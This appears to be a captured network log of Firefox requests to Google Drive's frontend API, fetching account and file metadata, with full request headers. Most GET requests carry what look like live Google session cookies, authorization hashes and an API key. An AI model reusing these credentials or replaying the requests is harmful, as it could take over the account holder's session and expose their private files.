t_details(target_id,target_mime_type,target_lookup_status,target_item,can_request_access_to_target),last_modifying_user(id,focus_user_id,is_me,type,email),customer_id,ancestor_has_own_permissions,has_thumbnail,thumbnail_version,title,mime_type,id,resource_key,abuse_is_appealable,abuse_notice_reason,spam_metadata(marked_as_spam_date_millis,in_spam_view,is_spam,is_inherited_spam),shared,access_requests_count,has_incoming_approval,shared_with_me_date_millis,user_role,inheritance_broken,explicitly_trashed,quota_bytes_used,subscribed,folder_color,has_child_folder,starred,file_extension,primary_sync_parent,sharing_user(id,focus_user_id,is_me,type,email),flagged_for_abuse,folder_features,spaces,source_app_id,trashed,recency_date_millis,recency_date_reason,restricted,version,action_item,viewed,team_drive_id,has_own_permissions,create_date_millis,primary_domain_name,organization_display_name,passively_subscribed,trashing_user(id,focus_user_id,is_me,type,email),trashed_date_millis,item_location(parent(folder_color,drive_id,has_augmented_permissions,icon_url,id,mime_type,resource_key,shared,title,trashed,trusted_drive,version))))
content-type: application/json+protobuf
x-goog-ext-472780938-jspb: W1tudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMSxudWxsLG51bGwsWzJdXV0=
x-goog-drive-client-version: drive.web-frontend_20250106.13_p1
authorization: SAPISIDHASH 1736791507_c3a95877e83192bede102fcc08ef1979dcffa30c_u SAPISID1PHASH 1736791507_c3a95877e83192bede102fcc08ef1979dcffa30c_u SAPISID3PHASH 1736791507_c3a95877e83192bede102fcc08ef1979dcffa30c_u
x-goog-authuser: 0
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=T_04-M8kKBur6a8xfbOKZjmjNL9kTBsRu4rsNMCHs2QeEnTGsSCv--CsUMA_7Anz-hnwKJxFceW9q7mFYd14TmmcRAIhSK1Oeg6osJyBPYL1pMxtdcR4OvTEnQ7S4FVUZSmXpoI5O0b0LQspJ9OJHjc0TCkB9hkcyI9YNZQ3H2G7mfch4GnsYQvFz7Zr9drrPCv8DidNMVtOI3oX2R9pf_Dcw77_z5rHJ6vSCU_yZxpvCkN76iAOCjoeiO1DW4sMIZ71Q_b_wECFS0hLszxIr4-MtFCeYZdWG-jHBBGz2zB0G6YokmReQFCtWrc_bai1UtObFu84NlaCLo_skwU5OOaIh27ImtzuhLub6cZQgKtvcqV09hIl7WhSHJvvytzRewFKw9q4ZzayCCw8DdlzO2I0Sh84i2-7ovfi9bwhHCL7fWPuG198xV3FS29hl4Nsr-F61VKb1RRTL2GWYIv4sY32ZwKErJsagoREX6wvEq9r5SOmW1IJhGRF2yOChgizYZ_Z2ZtMgxC1swD_aed-u80wmGjuIy_IGSMSzwlxZjm082Up-Ir0-C3oC0ytfiuk1Pd1LpY7I3AZM3005BIX5eiLzuVx43Y2fsqy6NOYsdhCipia86DC-k-N04EQow14XpWm9CPIRFYLHQKYMBoMsjnyTTpZfeNHkW-UdlDnvujgiv7-_z7t8brpew
cookie: __Secure-ENID=25.SE=bIIYgZkZWxhYfRmTcrOp3sqFLMtvji3aZrqUKJ8_J-Se7rF06urKMhgsY_OeHZxHrszdkyWyOsrwOlPtB6uBsuqmbJNJjb-k8ICDK78IXtvLAvxcANzv2ZaK0qz93HLrtH34QTHXH5pz_2JhzrqcnV4_qWtPRm_xNPez8_ksAJ7N-T39bULuUM7sPoyr6wLsVz2Z3sHgrVg
cookie: SID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87LbvT2mFp1XSQhsDasaQ5vQACgYKAboSARQSFQHGX2MipA0LB7c7dUJjxss4u9dqrBoVAUF8yKpGZiDl2Ga6DapczbtlldaB0076
cookie: __Secure-1PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87aCaNml9AANUb757qiR4SZAACgYKAWgSARQSFQHGX2MiEKAz7esHB3ithEcaY5wZ_hoVAUF8yKq4lYskHkX1uMPsUQAUwSmT0076
cookie: __Secure-3PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87b7qnsIBhDzT85TfZY1T0FAACgYKAeISARQSFQHGX2MikazmDfD73D18BiRF0NYpwBoVAUF8yKoaxFjFpOH7_uqYoOO9p66d0076
cookie: HSID=AB3UyDpOk1JCyfzEB
cookie: SSID=A0N6rAyypBzbvJcK2
cookie: APISID=zoylvknzg7AfstSu/A1huANewAO8jtX2AS
cookie: SAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-1PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-3PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: SIDCC=AKEyXzUdfF9ysvGVqQ8yMB6Fq_vDgc3HGDjpLn6IQPZrOhS6ge4rGx7n1nuO6VcOt4OJwyTTkQ
cookie: __Secure-1PSIDCC=AKEyXzVBOKym1Zj3DRTKXaC5k5piNKitJGEE-cSg2Tkuq7oBAqKoQlDVhfWDLwu5uDarY8AAVg
cookie: __Secure-3PSIDCC=AKEyXzUt3qVYxGcsvRP3wJI64jK-jKxU1kzDdjP5eHwl1lG4bPSrFpZ8z0sNKqsa2mCATRXhhQ
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
GET

https://drivefrontend-pa.clients6.google.com/v1/account?alt=protojson&fields=account.drive_for_desktop_settings.switchblade_psk%2Caccount.enterprise_settings.can_access_admin_console%2Caccount.metadata.backend_diagnostics.backend%2Caccount.metadata.gsuite_subscription_info.status%2Caccount.metadata.gsuite_subscription_info.trial_end_time_millis%2Caccount.metadata.gsuite_subscription_info.trial_millis_remaining%2Caccount.metadata.import_format%2Caccount.metadata.quota.bytes_limit%2Caccount.metadata.quota.bytes_remaining%2Caccount.metadata.quota.bytes_used_by_all_services%2Caccount.metadata.quota.bytes_used_by_user%2Caccount.metadata.quota.bytes_used_in_drive_trash_by_user%2Caccount.metadata.quota.grace_period_info.active%2Caccount.metadata.quota.grace_period_info.additional_quota_bytes%2Caccount.metadata.quota.grace_period_info.end_timestamp_millis%2Caccount.metadata.quota.individual_bytes_limit%2Caccount.metadata.quota.individual_usage_state%2Caccount.metadata.quota.quota_bytes_total%2Caccount.metadata.quota.quota_bytes_used%2Caccount.metadata.quota.quota_bytes_used_aggregate%2Caccount.metadata.quota.quota_bytes_used_in_trash%2Caccount.metadata.quota.quota_status%2Caccount.metadata.quota.quota_type%2Caccount.metadata.quota.service_usage.bytes_used%2Caccount.metadata.quota.service_usage.service_key%2Caccount.metadata.quota.usage_state%2Caccount.metadata.root_folder_id%2Caccount.metadata.target_audiences.audience_id%2Caccount.metadata.target_audiences.display_name%2Caccount.metadata.team_dashboard_capabilities.can_administer_team%2Caccount.metadata.team_dashboard_capabilities.can_manage_invites%2Caccount.search_settings.can_display_zero_state_search%2Caccount.shared_drives_settings.can_create_shared_drives%2Caccount.shared_drives_settings.can_interact_with_shared_drives%2Caccount.shared_drives_settings.can_migrate_to_shared_drives_as_admin%2Caccount.shared_drives_settings.has_shared_drives%2Caccount.storage_settings.can_buy_storage%2Caccount.user.email_from_account%2Caccount.user.focus_user_id%2Caccount.user.id%2Caccount.user.photo_url%2Caccount.user.short_name%2Caccount.user_pref%2Caccount.view_settings.show_machine_root_view%2Caccount.workspace_settings.can_create_workspaces&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

firefox.exe

Remote address:

142.250.187.202:443

Request

GET /v1/account?alt=protojson&fields=account.drive_for_desktop_settings.switchblade_psk%2Caccount.enterprise_settings.can_access_admin_console%2Caccount.metadata.backend_diagnostics.backend%2Caccount.metadata.gsuite_subscription_info.status%2Caccount.metadata.gsuite_subscription_info.trial_end_time_millis%2Caccount.metadata.gsuite_subscription_info.trial_millis_remaining%2Caccount.metadata.import_format%2Caccount.metadata.quota.bytes_limit%2Caccount.metadata.quota.bytes_remaining%2Caccount.metadata.quota.bytes_used_by_all_services%2Caccount.metadata.quota.bytes_used_by_user%2Caccount.metadata.quota.bytes_used_in_drive_trash_by_user%2Caccount.metadata.quota.grace_period_info.active%2Caccount.metadata.quota.grace_period_info.additional_quota_bytes%2Caccount.metadata.quota.grace_period_info.end_timestamp_millis%2Caccount.metadata.quota.individual_bytes_limit%2Caccount.metadata.quota.individual_usage_state%2Caccount.metadata.quota.quota_bytes_total%2Caccount.metadata.quota.quota_bytes_used%2Caccount.metadata.quota.quota_bytes_used_aggregate%2Caccount.metadata.quota.quota_bytes_used_in_trash%2Caccount.metadata.quota.quota_status%2Caccount.metadata.quota.quota_type%2Caccount.metadata.quota.service_usage.bytes_used%2Caccount.metadata.quota.service_usage.service_key%2Caccount.metadata.quota.usage_state%2Caccount.metadata.root_folder_id%2Caccount.metadata.target_audiences.audience_id%2Caccount.metadata.target_audiences.display_name%2Caccount.metadata.team_dashboard_capabilities.can_administer_team%2Caccount.metadata.team_dashboard_capabilities.can_manage_invites%2Caccount.search_settings.can_display_zero_state_search%2Caccount.shared_drives_settings.can_create_shared_drives%2Caccount.shared_drives_settings.can_interact_with_shared_drives%2Caccount.shared_drives_settings.can_migrate_to_shared_drives_as_admin%2Caccount.shared_drives_settings.has_shared_drives%2Caccount.storage_settings.can_buy_storage%2Caccount.user.email_from_account%2Caccount.user.focus_user_id%2Caccount.user.id%2Caccount.user.photo_url%2Caccount.user.short_name%2Caccount.user_pref%2Caccount.view_settings.show_machine_root_view%2Caccount.workspace_settings.can_create_workspaces&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: drivefrontend-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json+protobuf
x-goog-drive-client-version: drive.web-frontend_20250106.13_p1
authorization: SAPISIDHASH 1736791507_c3a95877e83192bede102fcc08ef1979dcffa30c_u SAPISID1PHASH 1736791507_c3a95877e83192bede102fcc08ef1979dcffa30c_u SAPISID3PHASH 1736791507_c3a95877e83192bede102fcc08ef1979dcffa30c_u
x-goog-authuser: 0
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=T_04-M8kKBur6a8xfbOKZjmjNL9kTBsRu4rsNMCHs2QeEnTGsSCv--CsUMA_7Anz-hnwKJxFceW9q7mFYd14TmmcRAIhSK1Oeg6osJyBPYL1pMxtdcR4OvTEnQ7S4FVUZSmXpoI5O0b0LQspJ9OJHjc0TCkB9hkcyI9YNZQ3H2G7mfch4GnsYQvFz7Zr9drrPCv8DidNMVtOI3oX2R9pf_Dcw77_z5rHJ6vSCU_yZxpvCkN76iAOCjoeiO1DW4sMIZ71Q_b_wECFS0hLszxIr4-MtFCeYZdWG-jHBBGz2zB0G6YokmReQFCtWrc_bai1UtObFu84NlaCLo_skwU5OOaIh27ImtzuhLub6cZQgKtvcqV09hIl7WhSHJvvytzRewFKw9q4ZzayCCw8DdlzO2I0Sh84i2-7ovfi9bwhHCL7fWPuG198xV3FS29hl4Nsr-F61VKb1RRTL2GWYIv4sY32ZwKErJsagoREX6wvEq9r5SOmW1IJhGRF2yOChgizYZ_Z2ZtMgxC1swD_aed-u80wmGjuIy_IGSMSzwlxZjm082Up-Ir0-C3oC0ytfiuk1Pd1LpY7I3AZM3005BIX5eiLzuVx43Y2fsqy6NOYsdhCipia86DC-k-N04EQow14XpWm9CPIRFYLHQKYMBoMsjnyTTpZfeNHkW-UdlDnvujgiv7-_z7t8brpew
cookie: __Secure-ENID=25.SE=bIIYgZkZWxhYfRmTcrOp3sqFLMtvji3aZrqUKJ8_J-Se7rF06urKMhgsY_OeHZxHrszdkyWyOsrwOlPtB6uBsuqmbJNJjb-k8ICDK78IXtvLAvxcANzv2ZaK0qz93HLrtH34QTHXH5pz_2JhzrqcnV4_qWtPRm_xNPez8_ksAJ7N-T39bULuUM7sPoyr6wLsVz2Z3sHgrVg
cookie: SID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87LbvT2mFp1XSQhsDasaQ5vQACgYKAboSARQSFQHGX2MipA0LB7c7dUJjxss4u9dqrBoVAUF8yKpGZiDl2Ga6DapczbtlldaB0076
cookie: __Secure-1PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87aCaNml9AANUb757qiR4SZAACgYKAWgSARQSFQHGX2MiEKAz7esHB3ithEcaY5wZ_hoVAUF8yKq4lYskHkX1uMPsUQAUwSmT0076
cookie: __Secure-3PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87b7qnsIBhDzT85TfZY1T0FAACgYKAeISARQSFQHGX2MikazmDfD73D18BiRF0NYpwBoVAUF8yKoaxFjFpOH7_uqYoOO9p66d0076
cookie: HSID=AB3UyDpOk1JCyfzEB
cookie: SSID=A0N6rAyypBzbvJcK2
cookie: APISID=zoylvknzg7AfstSu/A1huANewAO8jtX2AS
cookie: SAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-1PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-3PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: SIDCC=AKEyXzVtXhoFjNStq47hHXmseTPxp-eooskUoh_YYm1v5fSEhejtY1ZfrOKclaiFBJIPNebD6w
cookie: __Secure-1PSIDCC=AKEyXzXBlkfPGWhS9crPfya2yNBRnFS7hQQfh9jvmeI-x0CbVciUQAOMmRcckqncsAfZlYevQg
cookie: __Secure-3PSIDCC=AKEyXzV174p6vvTKyv3VIBCmNlRatqNEqDY0PKo7YHPM2dL9oiJrLDCZQNvtnGxEUz7xd-hQgw
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
GET

https://drivefrontend-pa.clients6.google.com/v1/items:get?ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

firefox.exe

Remote address:

142.250.187.202:443

Request

GET /v1/items:get?ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: drivefrontend-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en
accept-encoding: gzip, deflate, br
x-goog-fieldmask: responses(status(code,message,details),item(parent,modified_date_millis,has_visitor_permissions,contains_unsubscribed_children,capabilities(can_move_item_into_team_drive,can_untrash,can_modify_content_restriction,can_move_item_within_team_drive,can_move_item_out_of_team_drive,can_delete_children,can_trash_children,can_request_approval,can_read_category_metadata,can_edit_category_metadata,can_add_my_drive_parent,can_remove_my_drive_parent,can_share_child_files,can_share_child_folders,can_read,can_move_item_within_drive,can_move_children_within_drive,can_add_folder_from_another_drive,can_change_security_update_enabled,can_block_owner,can_report_spam_or_abuse,can_copy_non_authoritative,can_download_non_authoritative,can_report_not_spam,can_initiate_esignature,can_copy,can_download,can_edit,can_add_children,can_delete,can_remove_children,can_share,can_trash,can_rename,can_list_children,can_read_team_drive,can_move_team_drive_item),modified_by_me_date_millis,last_viewed_by_me_date_millis,alternate_link,workspace_id,file_size,content_restrictions(read_only),approval_version,owner(id,focus_user_id,is_me,type,email),approval_summaries,shortcut_details(target_id,target_mime_type,target_lookup_status,target_item,can_request_access_to_target),last_modifying_user(id,focus_user_id,is_me,type,email),customer_id,ancestor_has_own_permissions,has_thumbnail,thumbnail_version,title,mime_type,id,resource_key,abuse_is_appealable,abuse_notice_reason,spam_metadata(marked_as_spam_date_millis,in_spam_view,is_spam,is_inherited_spam),shared,access_requests_count,has_incoming_approval,shared_with_me_date_millis,user_role,inheritance_broken,explicitly_trashed,quota_bytes_used,subscribed,folder_color,has_child_folder,starred,file_extension,primary_sync_parent,sharing_user(id,focus_user_id,is_me,type,email),flagged_for_abuse,folder_features,spaces,source_app_id,trashed,recency_date_millis,recency_date_reason,restricted,version,action_item,viewed,team_drive_id,has_own_permissions,create_date_millis,primary_domain_name,organization_display_name,passively_subscribed,trashing_user(id,focus_user_id,is_me,type,email),trashed_date_millis))
content-type: application/json+protobuf
x-goog-ext-472780938-jspb: W1szMTEsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCwxLG51bGwsbnVsbCxbMl1dXQ==
x-goog-drive-client-version: drive.web-frontend_20250106.13_p1
authorization: SAPISIDHASH 1736791507_c3a95877e83192bede102fcc08ef1979dcffa30c_u SAPISID1PHASH 1736791507_c3a95877e83192bede102fcc08ef1979dcffa30c_u SAPISID3PHASH 1736791507_c3a95877e83192bede102fcc08ef1979dcffa30c_u
x-goog-authuser: 0
origin: https://drive.google.com
referer: https://drive.google.com/
cookie: NID=520=T_04-M8kKBur6a8xfbOKZjmjNL9kTBsRu4rsNMCHs2QeEnTGsSCv--CsUMA_7Anz-hnwKJxFceW9q7mFYd14TmmcRAIhSK1Oeg6osJyBPYL1pMxtdcR4OvTEnQ7S4FVUZSmXpoI5O0b0LQspJ9OJHjc0TCkB9hkcyI9YNZQ3H2G7mfch4GnsYQvFz7Zr9drrPCv8DidNMVtOI3oX2R9pf_Dcw77_z5rHJ6vSCU_yZxpvCkN76iAOCjoeiO1DW4sMIZ71Q_b_wECFS0hLszxIr4-MtFCeYZdWG-jHBBGz2zB0G6YokmReQFCtWrc_bai1UtObFu84NlaCLo_skwU5OOaIh27ImtzuhLub6cZQgKtvcqV09hIl7WhSHJvvytzRewFKw9q4ZzayCCw8DdlzO2I0Sh84i2-7ovfi9bwhHCL7fWPuG198xV3FS29hl4Nsr-F61VKb1RRTL2GWYIv4sY32ZwKErJsagoREX6wvEq9r5SOmW1IJhGRF2yOChgizYZ_Z2ZtMgxC1swD_aed-u80wmGjuIy_IGSMSzwlxZjm082Up-Ir0-C3oC0ytfiuk1Pd1LpY7I3AZM3005BIX5eiLzuVx43Y2fsqy6NOYsdhCipia86DC-k-N04EQow14XpWm9CPIRFYLHQKYMBoMsjnyTTpZfeNHkW-UdlDnvujgiv7-_z7t8brpew
cookie: __Secure-ENID=25.SE=bIIYgZkZWxhYfRmTcrOp3sqFLMtvji3aZrqUKJ8_J-Se7rF06urKMhgsY_OeHZxHrszdkyWyOsrwOlPtB6uBsuqmbJNJjb-k8ICDK78IXtvLAvxcANzv2ZaK0qz93HLrtH34QTHXH5pz_2JhzrqcnV4_qWtPRm_xNPez8_ksAJ7N-T39bULuUM7sPoyr6wLsVz2Z3sHgrVg
cookie: SID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87LbvT2mFp1XSQhsDasaQ5vQACgYKAboSARQSFQHGX2MipA0LB7c7dUJjxss4u9dqrBoVAUF8yKpGZiDl2Ga6DapczbtlldaB0076
cookie: __Secure-1PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87aCaNml9AANUb757qiR4SZAACgYKAWgSARQSFQHGX2MiEKAz7esHB3ithEcaY5wZ_hoVAUF8yKq4lYskHkX1uMPsUQAUwSmT0076
cookie: __Secure-3PSID=g.a000sQhvJP28bvBdhGmvA_uumnI1SyYsG8kSDEXOdyxXnyfrQp87b7qnsIBhDzT85TfZY1T0FAACgYKAeISARQSFQHGX2MikazmDfD73D18BiRF0NYpwBoVAUF8yKoaxFjFpOH7_uqYoOO9p66d0076
cookie: HSID=AB3UyDpOk1JCyfzEB
cookie: SSID=A0N6rAyypBzbvJcK2
cookie: APISID=zoylvknzg7AfstSu/A1huANewAO8jtX2AS
cookie: SAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-1PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: __Secure-3PAPISID=-zbOnUI0BLX9iz1a/AodV7OT28tH23K3wr
cookie: SIDCC=AKEyXzUdfF9ysvGVqQ8yMB6Fq_vDgc3HGDjpLn6IQPZrOhS6ge4rGx7n1nuO6VcOt4OJwyTTkQ
cookie: __Secure-1PSIDCC=AKEyXzVBOKym1Zj3DRTKXaC5k5piNKitJGEE-cSg2Tkuq7oBAqKoQlDVhfWDLwu5uDarY8AAVg
cookie: __Secure-3PSIDCC=AKEyXzUt3qVYxGcsvRP3wJI64jK-jKxU1kzDdjP5eHwl1lG4bPSrFpZ8z0sNKqsa2mCATRXhhQ
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://drivefrontend-pa.clients6.google.com/v1/account?alt=protojson&fields=account.drive_for_desktop_settings.switchblade_psk%2Caccount.enterprise_settings.can_access_admin_console%2Caccount.metadata.backend_diagnostics.backend%2Caccount.metadata.gsuite_subscription_info.status%2Caccount.metadata.gsuite_subscription_info.trial_end_time_millis%2Caccount.metadata.gsuite_subscription_info.trial_millis_remaining%2Caccount.metadata.import_format%2Caccount.metadata.quota.bytes_limit%2Caccount.metadata.quota.bytes_remaining%2Caccount.metadata.quota.bytes_used_by_all_services%2Caccount.metadata.quota.bytes_used_by_user%2Caccount.metadata.quota.bytes_used_in_drive_trash_by_user%2Caccount.metadata.quota.grace_period_info.active%2Caccount.metadata.quota.grace_period_info.additional_quota_bytes%2Caccount.metadata.quota.grace_period_info.end_timestamp_millis%2Caccount.metadata.quota.individual_bytes_limit%2Caccount.metadata.quota.individual_usage_state%2Caccount.metadata.quota.quota_bytes_total%2Caccount.metadata.quota.quota_bytes_used%2Caccount.metadata.quota.quota_bytes_used_aggregate%2Caccount.metadata.quota.quota_bytes_used_in_trash%2Caccount.metadata.quota.quota_status%2Caccount.metadata.quota.quota_type%2Caccount.metadata.quota.service_usage.bytes_used%2Caccount.metadata.quota.service_usage.service_key%2Caccount.metadata.quota.usage_state%2Caccount.metadata.root_folder_id%2Caccount.metadata.target_audiences.audience_id%2Caccount.metadata.target_audiences.display_name%2Caccount.metadata.team_dashboard_capabilities.can_administer_team%2Caccount.metadata.team_dashboard_capabilities.can_manage_invites%2Caccount.search_settings.can_display_zero_state_search%2Caccount.shared_drives_settings.can_create_shared_drives%2Caccount.shared_drives_settings.can_interact_with_shared_drives%2Caccount.shared_drives_settings.can_migrate_to_shared_drives_as_admin%2Caccount.shared_drives_settings.has_shared_drives%2Caccount.storage_settings.can_buy_storage%2Caccount.user.email_from_account%2Caccount.user.focus_user_id%2Caccount.user.id%2Caccount.user.photo_url%2Caccount.user.short_name%2Caccount.user_pref%2Caccount.view_settings.show_machine_root_view%2Caccount.workspace_settings.can_create_workspaces&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

firefox.exe

Remote address:

142.250.187.202:443

Request

OPTIONS /v1/account?alt=protojson&fields=account.drive_for_desktop_settings.switchblade_psk%2Caccount.enterprise_settings.can_access_admin_console%2Caccount.metadata.backend_diagnostics.backend%2Caccount.metadata.gsuite_subscription_info.status%2Caccount.metadata.gsuite_subscription_info.trial_end_time_millis%2Caccount.metadata.gsuite_subscription_info.trial_millis_remaining%2Caccount.metadata.import_format%2Caccount.metadata.quota.bytes_limit%2Caccount.metadata.quota.bytes_remaining%2Caccount.metadata.quota.bytes_used_by_all_services%2Caccount.metadata.quota.bytes_used_by_user%2Caccount.metadata.quota.bytes_used_in_drive_trash_by_user%2Caccount.metadata.quota.grace_period_info.active%2Caccount.metadata.quota.grace_period_info.additional_quota_bytes%2Caccount.metadata.quota.grace_period_info.end_timestamp_millis%2Caccount.metadata.quota.individual_bytes_limit%2Caccount.metadata.quota.individual_usage_state%2Caccount.metadata.quota.quota_bytes_total%2Caccount.metadata.quota.quota_bytes_used%2Caccount.metadata.quota.quota_bytes_used_aggregate%2Caccount.metadata.quota.quota_bytes_used_in_trash%2Caccount.metadata.quota.quota_status%2Caccount.metadata.quota.quota_type%2Caccount.metadata.quota.service_usage.bytes_used%2Caccount.metadata.quota.service_usage.service_key%2Caccount.metadata.quota.usage_state%2Caccount.metadata.root_folder_id%2Caccount.metadata.target_audiences.audience_id%2Caccount.metadata.target_audiences.display_name%2Caccount.metadata.team_dashboard_capabilities.can_administer_team%2Caccount.metadata.team_dashboard_capabilities.can_manage_invites%2Caccount.search_settings.can_display_zero_state_search%2Caccount.shared_drives_settings.can_create_shared_drives%2Caccount.shared_drives_settings.can_interact_with_shared_drives%2Caccount.shared_drives_settings.can_migrate_to_shared_drives_as_admin%2Caccount.shared_drives_settings.has_shared_drives%2Caccount.storage_settings.can_buy_storage%2Caccount.user.email_from_account%2Caccount.user.focus_user_id%2Caccount.user.id%2Caccount.user.photo_url%2Caccount.user.short_name%2Caccount.user_pref%2Caccount.view_settings.show_machine_root_view%2Caccount.workspace_settings.can_create_workspaces&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: drivefrontend-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: GET
access-control-request-headers: authorization,content-type,x-goog-authuser,x-goog-drive-client-version
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://drivefrontend-pa.clients6.google.com/v1/items:get?ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

firefox.exe

Remote address:

142.250.187.202:443

Request

OPTIONS /v1/items:get?ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: drivefrontend-pa.clients6.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: GET
access-control-request-headers: authorization,content-type,x-goog-authuser,x-goog-drive-client-version,x-goog-ext-472780938-jspb,x-goog-fieldmask
referer: https://drive.google.com/
origin: https://drive.google.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-site
te: trailers
OPTIONS

https://drivefrontend-pa.clients6.google.com/v1/items:get?ids=1CQ3l-ye73oq1wBdFfdlKbypM2DR08-Zj&ids=1xd1Q3YJLoqhw70rnOdQliNmdQ5KqBqdq&ids=1Btq9FoqYl0OY_C0V04HQPDaGjQFeqEOS&ids=1TVXsQLtyGv7rGnMn36rGMLrX7rY-l-bQ&ids=10guvatC5NIRhl-fRGMpXXolo1fXuw2OY&ids=14u9OTDOoiDcpQ6h9nFPDSO_l6ujE53q7&ids=19Lgs3mcgKQ86IxOVYzY7QnYq9l2UL2hz&ids=1QfnsOpJbRMcyuyGEjc1Gvz-rk_06CDLm65vjbK2ITxA&ids=151EHf1YmqNj86r2ZLc-P2dOkE7sqLqWo&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

firefox.exe

Remote address:

142.250.187.202:443

Request

